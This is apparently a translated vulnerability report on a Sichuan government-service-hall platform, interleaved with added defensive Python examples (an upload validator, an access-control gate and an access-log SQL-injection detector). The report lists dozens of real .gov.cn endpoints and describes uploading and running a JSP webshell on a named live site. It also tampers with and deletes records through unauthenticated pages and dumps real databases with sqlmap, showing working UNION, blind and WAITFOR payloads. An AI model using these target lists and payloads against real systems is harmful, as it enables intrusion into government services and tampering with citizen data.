Note: the getshell part duplicates WooYun: Getshell vulnerability in government service halls across Sichuan province (common to county and city halls throughout Sichuan).

0x1
Getshell without login:
Below I pick a few sites at random for the demonstration:
http://egov.fszw.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.pzhzw.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.scdongqu.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.pzhsxq.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.hjxzwzx.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.glzwzx.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.ljzw.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.scnczw.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.wangcangzw.gov.cn:8080/pages/offLine/questerOffLine.jsp
I'll use this site for the demo:
http://egov.wangcangzw.gov.cn:8080/pages/offLine/questerOffLine.jsp
Upload a JSP shell directly. Once the upload succeeds, inspect the element or view the page source:
<a onclick="downloadAttachment('1.jsp','D:/J2EE/TongWeb5.0/autodeploy/kb.war/questerOffLine/b41dc16800b64c0cabf394a1440f6434.jsp');" style="cursor: hand;" target="_blank">1.jsp </a> <a onclick="delAttachment('26b63664135e4b40a99673161e1fcab2');" style="cursor: hand;"> 删除</a><br/>
Note the path here; the correct path is:
questerOffLine/b41dc16800b64c0cabf394a1440f6434.jsp
Alright, let's try opening our lovely shell:
http://egov.wangcangzw.gov.cn:8080/questerOffLine/b41dc16800b64c0cabf394a1440f6434.jsp
Success.
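From the defender's side, the upload above goes wrong in three places: no login is required, a .jsp is accepted, and the file is written under the deployed kb.war where the container executes it. The Python below is an added example (not code from the original report or from the affected product; the product itself is JSP, the language is chosen so the example runs stand-alone) showing the checks that close this: require an authenticated caller, refuse any server-side executable extension in any dotted segment, allow-list document types and sniff their magic bytes, and store under a random name in a directory outside the web root. The extension lists, magic bytes and storage root are assumptions for the example.

```python
"""Hardened attachment upload: the checks the questerOffLine handler lacks.

Added example, not code from the original report or from the affected
product. Allow-lists, magic bytes and the storage root are assumptions.
"""
import os
import secrets
from dataclasses import dataclass
from typing import List

# Only document/image attachments are accepted, by extension allow-list.
ALLOWED_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "png", "jpg", "jpeg"}

# Anything a servlet container (Tomcat, TongWeb, ...) would execute or deploy.
# Checked against every dotted segment, so "a.jsp.pdf" is refused like "a.jsp".
EXECUTABLE_EXTENSIONS = {"jsp", "jspx", "jspf", "jsw", "jsv", "war", "jar", "class"}

# Magic-byte prefixes for the formats we can sniff (well-known values, assumed here).
MAGIC_BY_EXT = {
    "pdf": (b"%PDF-",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


@dataclass
class UploadResult:
    accepted: bool
    reason: str
    stored_name: str = ""  # random; never derived from the client-supplied name


def extensions_of(filename: str) -> List[str]:
    """All dotted segments after the first, lower-cased: 'a.jsp.pdf' -> ['jsp', 'pdf']."""
    base = os.path.basename(filename.replace("\\", "/"))
    return [seg.lower() for seg in base.split(".")[1:]]


def validate_upload(filename: str, content: bytes, authenticated: bool) -> UploadResult:
    """Pure decision function: no disk I/O, so it is easy to unit-test."""
    if not authenticated:
        return UploadResult(False, "login required")
    if not filename.strip() or "\x00" in filename:
        return UploadResult(False, "malformed filename")
    exts = extensions_of(filename)
    if not exts:
        return UploadResult(False, "no extension")
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return UploadResult(False, "server-side executable extension")
    ext = exts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return UploadResult(False, "extension ." + ext + " not allowed")
    expected = MAGIC_BY_EXT.get(ext)
    if expected and not content.startswith(expected):
        return UploadResult(False, "content does not match extension")
    # Random, fixed-length name that keeps only the vetted extension.
    return UploadResult(True, "ok", secrets.token_hex(16) + "." + ext)


def store_upload(result: UploadResult, content: bytes, storage_root: str) -> str:
    """Write an accepted upload under storage_root, which must not be web-served.

    The stored name is not a path the browser can request; downloads go through
    an authenticated handler that streams the file by its database id.
    """
    if not result.accepted:
        raise ValueError(result.reason)
    path = os.path.join(storage_root, result.stored_name)
    # O_EXCL refuses to clobber an existing file; 0o600 keeps it private on the host.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return path


if __name__ == "__main__":
    # Constructed sample inputs: a JSP-named file and a PDF-shaped file.
    print(validate_upload("1.jsp", b"<% %>", authenticated=True))
    print(validate_upload("notice.pdf", b"%PDF-1.4\n", authenticated=True))
```

The download side matters as much as the upload side: the HTML above hands the browser the absolute on-disk path, which is what let the uploaded file be located and requested directly; serving by database id through an authenticated handler removes that disclosure.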
0x2
Broken access control 1:
Affected file: servlet/search?state=2
http://www.zljzw.gov.cn:8080/servlet/search?state=2
http://egov.zgytzw.gov.cn:8080/servlet/search?state=2
http://egov.rxzw.gov.cn:8080/servlet/search?state=2
http://egov.fszw.cn:8080/servlet/search?state=2
http://egov.pzhzw.gov.cn:8080/servlet/search?state=2
http://egov.scdongqu.gov.cn:8080/servlet/search?state=2
http://egov.pzhsxq.gov.cn:8080/servlet/search?state=2
http://egovrh.pzhzw.gov.cn:8080/servlet/search?state=2
http://egov.lzjyzw.gov.cn:8080/servlet/search?state=2
http://www.sclxzw.gov.cn:8080/servlet/search?state=2
http://egov.hjxzwzx.gov.cn:8080/servlet/search?state=2
http://egov.xyzwzx.gov.cn:8080/servlet/search?state=2
http://egov.longmatan.gov.cn:8080/servlet/search?state=2
http://egov.naxi.gov.cn:8080/servlet/search?state=2
http://egov.glzwzx.gov.cn:8080/servlet/search?state=2
http://egov.dyzw.gov.cn:8080/servlet/search?state=2
http://egov.ghzw.gov.cn:8080/servlet/search?state=2
http://egov.ljzw.gov.cn:8080/servlet/search?state=2
http://egov.zjzw.dyzw.gov.cn:8080/servlet/search?state=2
http://egov.sfzw.gov.cn:8080/servlet/search?state=2
http://egov.jyzw.dyzw.gov.cn:8080/servlet/search?state=2
http://egov.gyzwfw.gov.cn:8080/servlet/search?state=2
http://egov.cxzw.gov.cn:8080/servlet/search?state=2
http://egov.lzzwfw.gov.cn:8080/servlet/search?state=2
http://egov.jgzw.gov.cn:8080/servlet/search?state=2
http://egov.wangcangzw.gov.cn:8080/servlet/search?state=2
http://egov.gyybzw.gov.cn:8080/servlet/search?state=2
http://egov.gyctzw.gov.cn:8080/servlet/search?state=2
http://egov.qczw.gov.cn:8080/servlet/search?state=2
http://egov.scsn.gov.cn:8080/servlet/search?state=2
http://egov.wtq.gov.cn:8080/servlet/search?state=2
http://egov.shawan.gov.cn:8080/servlet/search?state=2
http://egov.jingyan.gov.cn:8080/servlet/search?state=2
http://egov.lsszq.gov.cn:8080/servlet/search?state=2
http://egov.emeishan.gov.cn:8080/servlet/search?state=2
http://egov.eb.gov.cn:8080/servlet/search?state=2
http://egov.qwzw.gov.cn:8080/servlet/search?state=2
http://egov.jiajiang.gov.cn:8080/servlet/search?state=2
http://egov.muchuan.gov.cn:8080/servlet/search?state=2
http://egov.jkh.gov.cn:8080/servlet/search?state=2
http://egov.mabian.gov.cn:8080/servlet/search?state=2
http://egov.scnczw.gov.cn:8080/servlet/search?state=2
Pick one at random:
Let's try modifying it:
After the change it jumps automatically to the "pending review" section; we click through to "published".
This is the entry we just modified. Let's open it and see whether the unauthorized modification went through.
Broken access control 1
Success.
0x3
Broken access control 2:
Affected file: MyJsp.jsp
In my own testing this works across the board, so below I just pick one site to test:
http://egov.fszw.cn:8080/MyJsp.jsp
Here let's try deleting a file at random.
The one numbered 00183 was deleted successfully.
Broken access control 2
Success.
0x4
Broken access control 3:
Affected file: dictpages/frameIndex.jsp
http://egov.fszw.cn:8080/dictpages/frameIndex.jsp
Adding, publishing and deleting all work the same way here, so I won't demonstrate it.
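What the three access-control findings (0x2 to 0x4) have in common is that the management handlers answer without any session at all. The Python below is an added example (not code from the original report or from the affected product) of the deny-by-default gate a servlet filter should apply in front of such handlers: public paths are an explicit set, every management path names the role it needs, anything unlisted fails closed, and the path is normalized before the lookup so "/servlet/../MyJsp.jsp" and case variants on a Windows host cannot route around the policy. The role names, the public-path set and the session shape are assumptions for the example.

```python
"""Deny-by-default authorization in front of management handlers.

Added example, not code from the original report or the affected product.
Role names, the public-path set and the session shape are assumptions.
"""
import posixpath
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

# Handlers a citizen may reach without logging in (assumed set, lower-cased).
PUBLIC_PATHS = {"/", "/index.jsp", "/pages/offline/questeroffline.jsp"}

# Management handlers and the role each requires (lower-cased paths). Anything
# neither listed here nor public is denied, so a forgotten handler fails closed.
ROLE_FOR_PATH = {
    "/servlet/search": "editor",            # review / publish queue
    "/myjsp.jsp": "admin",                  # file deletion
    "/dictpages/frameindex.jsp": "editor",  # dictionary add / publish / delete
}


@dataclass
class Session:
    user: str
    roles: Set[str] = field(default_factory=set)


@dataclass
class Decision:
    allowed: bool
    status: int
    reason: str


def normalize(request_path: str) -> str:
    """Strip query and fragment, collapse '.' and '..', and lower-case.

    Lower-casing matters on a Windows host (the report shows D:/J2EE/...),
    where /MyJsp.jsp and /myjsp.jsp are the same file.
    """
    path = request_path.split("?", 1)[0].split("#", 1)[0]
    path = posixpath.normpath("/" + path.lstrip("/"))
    return path.lower()


def authorize(request_path: str, session: Optional[Session]) -> Decision:
    path = normalize(request_path)
    if path in PUBLIC_PATHS:
        return Decision(True, 200, "public")
    if session is None:
        return Decision(False, 401, "login required")
    needed = ROLE_FOR_PATH.get(path)
    if needed is None:
        return Decision(False, 403, "no policy for handler")
    if needed not in session.roles:
        return Decision(False, 403, "role " + needed + " required")
    return Decision(True, 200, "ok")


def audit(requests: List[Tuple[str, Optional[Session]]]) -> List[str]:
    """Denied requests, one line each, for the security log."""
    lines = []
    for path, session in requests:
        d = authorize(path, session)
        if not d.allowed:
            who = session.user if session else "anonymous"
            lines.append("%s %s -> %d %s" % (who, normalize(path), d.status, d.reason))
    return lines


if __name__ == "__main__":
    # Constructed requests: the anonymous hits from the report, then a valid editor.
    for line in audit([("/servlet/search?state=2", None), ("/MyJsp.jsp", None)]):
        print(line)
    print(authorize("/servlet/search?state=2", Session("editor01", {"editor"})))
```

The 401-versus-403 split is deliberate: an anonymous request to a management path is a login problem, while a logged-in user lacking the role is a policy violation worth alerting on separately.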
0x5
SQL injection 1
http://egov.zgdazw.gov.cn:8080/servlet/view?qid=4
http://www.zljzw.gov.cn:8080/servlet/view?qid=4
http://egov.zgytzw.gov.cn:8080/servlet/view?qid=4
http://egov.rxzw.gov.cn:8080/servlet/view?qid=4
http://egov.fszw.cn:8080/servlet/view?qid=4
http://egov.pzhzw.gov.cn:8080/servlet/view?qid=4
http://egov.scdongqu.gov.cn:8080/servlet/view?qid=4
http://egov.pzhsxq.gov.cn:8080/servlet/view?qid=4
http://egovrh.pzhzw.gov.cn:8080/servlet/view?qid=4
http://egov.lzjyzw.gov.cn:8080/servlet/view?qid=4
http://www.sclxzw.gov.cn:8080/servlet/view?qid=4
http://egov.hjxzwzx.gov.cn:8080/servlet/view?qid=4
http://egov.xyzwzx.gov.cn:8080/servlet/view?qid=4
http://egov.longmatan.gov.cn:8080/servlet/view?qid=4
http://egov.naxi.gov.cn:8080/servlet/view?qid=4
http://egov.glzwzx.gov.cn:8080/servlet/view?qid=4
http://egov.dyzw.gov.cn:8080/servlet/view?qid=4
http://egov.ghzw.gov.cn:8080/servlet/view?qid=4
http://egov.ljzw.gov.cn:8080/servlet/view?qid=4
http://egov.zjzw.dyzw.gov.cn:8080/servlet/view?qid=4
http://egov.sfzw.gov.cn:8080/servlet/view?qid=4
http://egov.jyzw.dyzw.gov.cn:8080/servlet/view?qid=4
http://egov.gyzwfw.gov.cn:8080/servlet/view?qid=4
http://egov.cxzw.gov.cn:8080/servlet/view?qid=4
http://egov.lzzwfw.gov.cn:8080/servlet/view?qid=4
http://egov.jgzw.gov.cn:8080/servlet/view?qid=4
http://egov.wangcangzw.gov.cn:8080/servlet/view?qid=4
http://egov.gyybzw.gov.cn:8080/servlet/view?qid=4
http://egov.gyctzw.gov.cn:8080/servlet/view?qid=4
http://egov.qczw.gov.cn:8080/servlet/view?qid=4
http://egov.scsn.gov.cn:8080/servlet/view?qid=4
http://egov.wtq.gov.cn:8080/servlet/view?qid=4
http://egov.shawan.gov.cn:8080/servlet/view?qid=4
http://egov.jingyan.gov.cn:8080/servlet/view?qid=4
http://egov.lsszq.gov.cn:8080/servlet/view?qid=4
http://egov.emeishan.gov.cn:8080/servlet/view?qid=4
http://egov.eb.gov.cn:8080/servlet/view?qid=4
http://egov.qwzw.gov.cn:8080/servlet/view?qid=4
http://egov.jiajiang.gov.cn:8080/servlet/view?qid=4
http://egov.muchuan.gov.cn:8080/servlet/view?qid=4
http://egov.jkh.gov.cn:8080/servlet/view?qid=4
http://egov.mabian.gov.cn:8080/servlet/view?qid=4
http://egov.scnczw.gov.cn:8080/servlet/view?qid=4
There were too many tables, so I didn't let it run to the end.
[root@Hacker~]# Sqlmap -u http://egov.zgdazw.gov.cn:8080/servlet/view?qid=4 --tables
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 03:02:48
[03:02:48] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:02:48] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: qid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: qid=4 AND 2802=2802

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: qid=-1600 UNION ALL SELECT NULL, CHAR(58)+CHAR(119)+CHAR(99)+CHAR(118)+CHAR(58)+CHAR(66)+CHAR(72)+CHAR(99)+CHAR(116)+CHAR(68)+CHAR(112)+CHAR(84)+CHAR(111)+CHAR(122)+CHAR(68)+CHAR(58)+CHAR(118)+CHAR(115)+CHAR(105)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: qid=4; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: qid=4 WAITFOR DELAY '0:0:5'--
---
[03:02:48] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
[03:02:48] [INFO] fetching database names
[03:02:49] [INFO] the SQL query used returns 13 entries
[03:02:49] [INFO] retrieved: "Egh"
[03:02:49] [INFO] retrieved: "EghFiles"
[03:02:50] [INFO] retrieved: "master"
[03:02:50] [INFO] retrieved: "model"
[03:02:50] [INFO] retrieved: "msdb"
[03:02:50] [INFO] retrieved: "ReportServer"
[03:02:50] [INFO] retrieved: "ReportServerTempDB"
[03:02:51] [INFO] retrieved: "tempdb"
[03:02:51] [INFO] retrieved: "tyfocontent"
[03:02:51] [INFO] retrieved: "tyfoinvestigate"
[03:02:51] [INFO] retrieved: "tyfomsg"
[03:02:52] [INFO] retrieved: "tyfopublish"
[03:02:52] [INFO] retrieved: "tyfosearch"
[03:02:52] [INFO] fetching tables for databases: Egh, EghFiles, ReportServer, ReportServerTempDB, master, model, msdb, tempdb, tyfocontent, tyfoinvestigate, tyfomsg, tyfopublish, tyfosearch
[03:02:53] [INFO] the SQL query used returns 68 entries
[03:02:53] [INFO] retrieved: "dbo.AppProject"
[03:02:53] [INFO] retrieved: "dbo.Appraise"
[03:02:53] [INFO] retrieved: "dbo.BackUserPwd"
[03:02:54] [INFO] retrieved: "dbo.Complaints"
[03:02:54] [INFO] retrieved: "dbo.ConsultLabel"
[03:02:54] [INFO] retrieved: "dbo.ConvenienceCenter"
[03:02:54] [INFO] retrieved: "dbo.D99_Tmp"
[03:02:55] [INFO] retrieved: "dbo.data_file"
[03:02:55] [INFO] retrieved: "dbo.DateSet"
[03:02:55] [INFO] retrieved: "dbo.Datum"
[03:02:55] [INFO] retrieved: "dbo.datumlegend"
[03:02:56] [INFO] retrieved: "dbo.FlowSet"
[03:02:56] [INFO] retrieved: "dbo.FlowShip"
[03:02:56] [INFO] retrieved: "dbo.FlowTurnOut"
[03:02:56] [INFO] retrieved: "dbo.GscApproveConditionSet"
[03:02:56] [INFO] retrieved: "dbo.GscDay"
[03:02:57] [INFO] retrieved: "dbo.GscOrgan"
[03:02:57] [INFO] retrieved: "dbo.GscPubUser"
[03:02:57] [INFO] retrieved: "dbo.GscUser"
[03:02:57] [INFO] retrieved: "dbo.HandedData"
[03:02:58] [INFO] retrieved: "dbo.HandedDataFile"
[03:02:58] [INFO] retrieved: "dbo.KB_KEYWORD"
[03:02:58] [INFO] retrieved: "dbo.KB_QUESTION_ANSWER"
[03:02:58] [INFO] retrieved: "dbo.KB_SAME_KEY"
[03:02:59] [INFO] retrieved: "dbo.KB_WORD_QUESTION"
[03:02:59] [INFO] retrieved: "dbo.Label_UserPriority"
[03:02:59] [INFO] retrieved: "dbo.Log"
[03:02:59] [INFO] retrieved: "dbo.MSG_auto_reply"
[03:03:00] [INFO] retrieved: "dbo.MSG_CONTENTS"
[03:03:00] [INFO] retrieved: "dbo.MSG_NO"
[03:03:00] [INFO] retrieved: "dbo.MSG_OverTime"
[03:03:01] [INFO] retrieved: "dbo.MSG_POOL"
[03:03:01] [INFO] retrieved: "dbo.MSG_QUESTER"
[03:03:01] [INFO] retrieved: "dbo.MSG_SATIS"
[03:03:01] [INFO] retrieved: "dbo.MSG_WORK_DEPT"
[03:03:02] [INFO] retrieved: "dbo.MSG_WORK_ONLINE"
[03:03:02] [INFO] retrieved: "dbo.one_tb_data"
[03:03:02] [INFO] retrieved: "dbo.one_tb_model"
[03:03:02] [INFO] retrieved: "dbo.ORG_ONLINE"
[03:03:03] [INFO] retrieved: "dbo.OrganAppWorkStat"
[03:03:03] [INFO] retrieved: "dbo.Parallel"
[03:03:03] [INFO] retrieved: "dbo.ParallelRelation"
[03:03:03] [INFO] retrieved: "dbo.predict"
[03:03:04] [INFO] retrieved: "dbo.Prejudication"
[03:03:04] [INFO] retrieved: "dbo.Processes"
[03:03:04] [INFO] retrieved: "dbo.Projects"
[03:03:04] [INFO] retrieved: "dbo.QuesterOffLine"
[03:03:04] [INFO] retrieved: "dbo.QuesterOffLineAttach"
[03:03:05] [INFO] retrieved: "dbo.RCC_COMPLAINTS"
[03:03:05] [INFO] retrieved: "dbo.RCC_LOG"
[03:03:05] [INFO] retrieved: "dbo.RCC_REDISSATISFILD"
[03:03:05] [INFO] retrieved: "dbo.RCC_REMINDED"
[03:03:06] [INFO] retrieved: "dbo.RES_RESERVATION"
[03:03:06] [INFO] retrieved: "dbo.SendEmailHistory"
[03:03:06] [INFO] retrieved: "dbo.SendEmailList"
[03:03:06] [INFO] retrieved: "dbo.SmsAdvice"
[03:03:07] [INFO] retrieved: "dbo.Sync"
[03:03:07] [INFO] retrieved: "dbo.SyncRecord"
[03:03:07] [INFO] retrieved: "dbo.T_Egh_AdminUsers"
[03:03:07] [INFO] retrieved: "dbo.T_Egh_SetPastoralPoetry"
[03:03:08] [INFO] retrieved: "dbo.T_Front_UserInfo"
[03:03:08] [INFO] retrieved: "dbo.T_Mobile_SMSSend"
[03:03:08] [INFO] retrieved: "dbo.T_Mobile_SMSSendHistory"
[03:03:09] [INFO] retrieved: "dbo.ThisGsc"
[03:03:09] [INFO] retrieved: "dbo.TurnOut"
[03:03:09] [INFO] retrieved: "dbo.UserKeepDataFile"
[03:03:09] [INFO] retrieved: "dbo.UserPower"
[03:03:10] [INFO] retrieved: "dbo.WarrntSet"
[03:03:10] [INFO] the SQL query used returns 1 entries
[03:03:11] [INFO] retrieved: "dbo.data_file"
[03:03:12] [INFO] the SQL query used returns 359 entries
[03:03:12] [INFO] retrieved: "dbo.spt_fallback_db"
[03:03:13] [INFO] retrieved: "dbo.spt_fallback_dev"
[03:03:13] [INFO] retrieved: "dbo.spt_fallback_usg"
[03:03:14] [INFO] retrieved: "dbo.spt_monitor"
[03:03:14] [INFO] retrieved: "dbo.spt_values"
[03:03:14] [INFO] retrieved: "INFORMATION_SCHEMA.CHECK_CONSTRAINTS"
[03:03:15] [INFO] retrieved: "INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE"
[03:03:15] [INFO] retrieved: "INFORMATION_SCHEMA.COLUMN_PRIVILEGES"
[03:03:16] [INFO] retrieved: "INFORMATION_SCHEMA.COLUMNS"
[03:03:16] [INFO] retrieved: "INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE"
[03:03:17] [INFO] retrieved: "INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE"
[03:03:17] [INFO] retrieved: "INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS"
[03:03:17] [INFO] retrieved: "INFORMATION_SCHEMA.DOMAINS"
[03:03:18] [INFO] retrieved: "INFORMATION_SCHEMA.KEY_COLUMN_USAGE"
[03:03:18] [INFO] retrieved: "INFORMATION_SCHEMA.PARAMETERS"
[03:03:19] [INFO] retrieved: "INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS"
[03:03:19] [INFO] retrieved: "INFORMATION_SCHEMA.ROUTINE_COLUMNS"
[03:03:19] [INFO] retrieved: "INFORMATION_SCHEMA.ROUTINES"
[03:03:20] [INFO] retrieved: "INFORMATION_SCHEMA.SCHEMATA"
[03:03:20] [INFO] retrieved: "INFORMATION_SCHEMA.TABLE_CONSTRAINTS"
[03:03:21] [INFO] retrieved: "INFORMATION_SCHEMA.TABLE_PRIVILEGES"
[03:03:21] [INFO] retrieved: "INFORMATION_SCHEMA.TABLES"
[03:03:22] [INFO] retrieved: "INFORMATION_SCHEMA.VIEW_COLUMN_USAGE"
[03:03:22] [INFO] retrieved: "INFORMATION_SCHEMA.VIEW_TABLE_USAGE"
[03:03:22] [INFO] retrieved: "INFORMATION_SCHEMA.VIEWS"
[03:03:23] [INFO] retrieved: "sys.all_columns"
[03:03:23] [INFO] retrieved: "sys.all_objects"
[03:03:24] [INFO] retrieved: "sys.all_parameters"
[03:03:24] [INFO] retrieved: "sys.all_sql_modules"
[03:03:25] [INFO] retrieved: "sys.all_views"
[03:03:25] [INFO] retrieved: "sys.allocation_units"
[03:03:26] [INFO] retrieved: "sys.assemblies"
[03:03:26] [INFO] retrieved: "sys.assembly_files"
[03:03:26] [INFO] retrieved: "sys.assembly_modules"
[03:03:27] [INFO] retrieved: "sys.assembly_references"
[03:03:27] [INFO] retrieved: "sys.assembly_types"
[03:03:28] [INFO] retrieved: "sys.asymmetric_keys"
[03:03:28] [INFO] retrieved: "sys.backup_devices"
[03:03:29] [INFO] retrieved: "sys.certificates"
[03:03:29] [INFO] retrieved: "sys.change_tracking_databases"
[03:03:32] [INFO] retrieved: "sys.change_tracking_tables"
[03:03:33] [INFO] retrieved: "sys.check_constraints"
[03:03:36] [INFO] retrieved: "sys.column_type_usages"
[03:03:37] [INFO] retrieved: "sys.column_xml_schema_collection_usages"
[03:03:38] [INFO] retrieved: "sys.columns"
[03:03:38] [INFO] retrieved: "sys.computed_columns"
[03:03:39] [INFO] retrieved: "sys.configurations"
[03:03:39] [INFO] retrieved: "sys.conversation_endpoints"
[03:03:39] [INFO] retrieved: "sys.conversation_groups"
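The sqlmap output above (and the kbedit run in 0x7, which uses the same four techniques) is also a detection signature: every probe it sent left a request line in the access log, and so did the uploaded .jsp from 0x1 when it was executed. The Python below is an added example (not code from the original report or from the affected product) that scans combined-format access-log lines for those shapes: the boolean tautology, UNION ALL SELECT with CHAR() concatenation, WAITFOR DELAY, and a 200 on a .jsp under /questerOffLine/. SAMPLE_LOG is constructed to mirror the payloads shown; the client addresses and the file name in it are made up, and the log format is assumed.

```python
"""Access-log detection for the injection and webshell traffic shown above.

Added example, not code from the original report or the affected product.
SAMPLE_LOG is constructed; addresses, timestamps and the .jsp name are made up.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote, unquote_plus, urlsplit

# Apache/Tomcat "combined" access-log line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures derived from the sqlmap payloads above; applied to the decoded query.
SQLI_SIGNATURES = [
    ("tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),   # qid=4 AND 2802=2802
    ("union", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("char-concat", re.compile(r"(?:CHAR\(\d+\)\+){3,}", re.I)),    # CHAR(58)+CHAR(119)+...
    ("waitfor-delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),    # stacked and time-based
]

# The upload handler stores attachments under a web-served path with a
# 32-hex-char name; a 200 on a .jsp there means an uploaded file was executed.
WEBSHELL_PATH = re.compile(r"^/questerOffLine/[0-9a-f]{32}\.jsp$", re.I)

SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2014:03:02:48 +0800] "GET /servlet/view?qid=4 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2014:03:02:48 +0800] "GET /servlet/view?qid=4%20AND%202802%3D2802 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2014:03:02:49 +0800] "GET /servlet/view?qid=-1600%20UNION%20ALL%20SELECT%20NULL,%20CHAR(58)%2BCHAR(119)%2BCHAR(99)%2BCHAR(118)%2BCHAR(58),%20NULL-- HTTP/1.1" 200 4871
203.0.113.7 - - [10/Jan/2014:03:02:55 +0800] "GET /servlet/view?qid=4;%20WAITFOR%20DELAY%20'0:0:5';-- HTTP/1.1" 200 5120
198.51.100.9 - - [10/Jan/2014:03:15:02 +0800] "GET /servlet/view?qid=5 HTTP/1.1" 200 5003
198.51.100.9 - - [10/Jan/2014:03:15:40 +0800] "GET /questerOffLine/0123456789abcdef0123456789abcdef.jsp HTTP/1.1" 200 312
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = unquote(parts.path)          # '+' is literal in a path
    entry["query"] = unquote_plus(parts.query)   # '+' is a space in a query
    return entry


def classify(entry: Dict[str, str]) -> List[str]:
    kinds = [name for name, rx in SQLI_SIGNATURES if rx.search(entry["query"])]
    if entry["status"] == "200" and WEBSHELL_PATH.match(entry["path"]):
        kinds.append("uploaded-jsp-executed")
    return kinds


def scan(lines) -> List[Tuple[str, str, str]]:
    """(client, finding, path) for every request that matches a signature."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for kind in classify(entry):
            findings.append((entry["ip"], kind, entry["path"]))
    return findings


def suspicious_clients(findings, min_kinds: int = 2) -> List[str]:
    """Clients that used more than one injection technique are scanner-driven."""
    per_ip: Dict[str, set] = {}
    for ip, kind, _ in findings:
        per_ip.setdefault(ip, set()).add(kind)
    return sorted(ip for ip, kinds in per_ip.items() if len(kinds) >= min_kinds)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for f in found:
        print(f)
    print("scanner-like clients:", suspicious_clients(found))
```

Decoding before matching is the part people get wrong: the payloads arrive percent-encoded, and a signature applied to the raw request line misses every one of them. The uploaded-jsp rule is the higher-value alert of the two, since a single hit already means code execution rather than probing.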
0x6
SQL injection 2
http://egov.zgdazw.gov.cn:8080/servlet/search?state=0
http://www.zljzw.gov.cn:8080/servlet/search?state=0
http://egov.zgytzw.gov.cn:8080/servlet/search?state=0
http://egov.rxzw.gov.cn:8080/servlet/search?state=0
http://egov.fszw.cn:8080/servlet/search?state=0
http://egov.pzhzw.gov.cn:8080/servlet/search?state=0
http://egov.scdongqu.gov.cn:8080/servlet/search?state=0
http://egov.pzhsxq.gov.cn:8080/servlet/search?state=0
http://egovrh.pzhzw.gov.cn:8080/servlet/search?state=0
http://egov.lzjyzw.gov.cn:8080/servlet/search?state=0
http://www.sclxzw.gov.cn:8080/servlet/search?state=0
http://egov.hjxzwzx.gov.cn:8080/servlet/search?state=0
http://egov.xyzwzx.gov.cn:8080/servlet/search?state=0
http://egov.longmatan.gov.cn:8080/servlet/search?state=0
http://egov.naxi.gov.cn:8080/servlet/search?state=0
http://egov.glzwzx.gov.cn:8080/servlet/search?state=0
http://egov.dyzw.gov.cn:8080/servlet/search?state=0
http://egov.ghzw.gov.cn:8080/servlet/search?state=0
http://egov.ljzw.gov.cn:8080/servlet/search?state=0
http://egov.zjzw.dyzw.gov.cn:8080/servlet/search?state=0
http://egov.sfzw.gov.cn:8080/servlet/search?state=0
http://egov.jyzw.dyzw.gov.cn:8080/servlet/search?state=0
http://egov.gyzwfw.gov.cn:8080/servlet/search?state=0
http://egov.cxzw.gov.cn:8080/servlet/search?state=0
http://egov.lzzwfw.gov.cn:8080/servlet/search?state=0
http://egov.jgzw.gov.cn:8080/servlet/search?state=0
http://egov.wangcangzw.gov.cn:8080/servlet/search?state=0
http://egov.gyybzw.gov.cn:8080/servlet/search?state=0
http://egov.gyctzw.gov.cn:8080/servlet/search?state=0
http://egov.qczw.gov.cn:8080/servlet/search?state=0
http://egov.scsn.gov.cn:8080/servlet/search?state=0
http://egov.wtq.gov.cn:8080/servlet/search?state=0
http://egov.shawan.gov.cn:8080/servlet/search?state=0
